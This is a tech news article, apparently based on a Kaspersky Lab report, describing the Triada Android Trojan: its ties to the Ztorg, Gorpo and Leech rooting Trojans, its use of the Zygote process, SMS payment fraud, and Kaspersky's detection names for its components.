There are 11 known mobile Trojan families that use root privileges. Three of them – Ztorg, Gorpo and Leech – act in cooperation with each other. Devices infected with these Trojans usually organize themselves into a network, creating a sort of advertising botnet that threat actors can use to install different kinds of adware. But that’s not all…

Shortly after rooting on the device, the above-mentioned Trojans download and install a backdoor. This then downloads and activates two modules that have the ability to download, install and launch applications.

The application loader and its installation modules refer to different types of Trojans, but all of them have been added to our antivirus databases under a common name – Triada.


Getting Into The Parental Android Process

A distinguishing feature of this malware is the use of Zygote – the parent of the application process on an Android device – that contains system libraries and frameworks used by every application installed on the device. In other words, it’s a demon whose purpose is to launch Android applications.

[adrotate banner=”4″]This is a standard app process that works for every newly installed application. It means that as soon as the Trojan gets into the system, it becomes part of the app process and will be pre-installed into any application launching on the device and can even change the logic of the application’s operations.

This is the first time technology like this has been seen in the wild. Prior to this a Trojan using Zygote was only known of as a proof-of-concept.

The stealth capabilities of this malware are very advanced. After getting into the user’s device Triada implements in nearly every working process and continues to exist in the short-term memory. This makes it almost impossible to detect and delete using antimalware solutions. Triada operates silently, meaning that all malicious activities are hidden both from the user and from other applications.

The complexity of the Triada Trojan’s functionality proves the fact that very professional cybercriminals, with a deep understanding of the targeted mobile platform, are behind this malware.


Triada’s Business Model

The Triada Trojan can modify outgoing SMS messages sent by other applications. This is now a major functionality of the malware. When a user is making in-app purchases via SMS for Android games, fraudsters are likely to modify the outgoing SMS so that they receive the money instead of the game developers.

“The Triada of Ztrog, Gorpo and Leech marks a new stage in the evolution of Android-based threats. They are the first widespread malware with the potential to escalate their privileges on most devices. The majority of users attacked by the Trojans were located in Russia, India and Ukraine as well as APAC countries. It is hard to underestimate the threat of a malicious application gaining root access to a device.

Their main threat, as the example of Triada shows, is in the fact that they provide access to the device for much more advanced and dangerous malicious applications. They also have a well-thought-out architecture developed by cybercriminals who have deep knowledge of the target mobile platform,” said Nikita Buchka. Junior Malware Analyst, Kaspersky Lab.

As it is nearly impossible to uninstall this malware from a device, users face two options to get rid of it. This first is to “root” their device and delete the malicious applications manually. The second option is to jailbreak the Android system on the device.


Kaspersky Lab Products Detect Triada Trojan Components As :

  • Trojan-Downloader.AndroidOS.Triada.a
  • Trojan-SMS.AndroidOS.Triada.a
  • Trojan-Banker.AndroidOS.Triada.a
  • Backdoor.AndroidOS.Triada.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!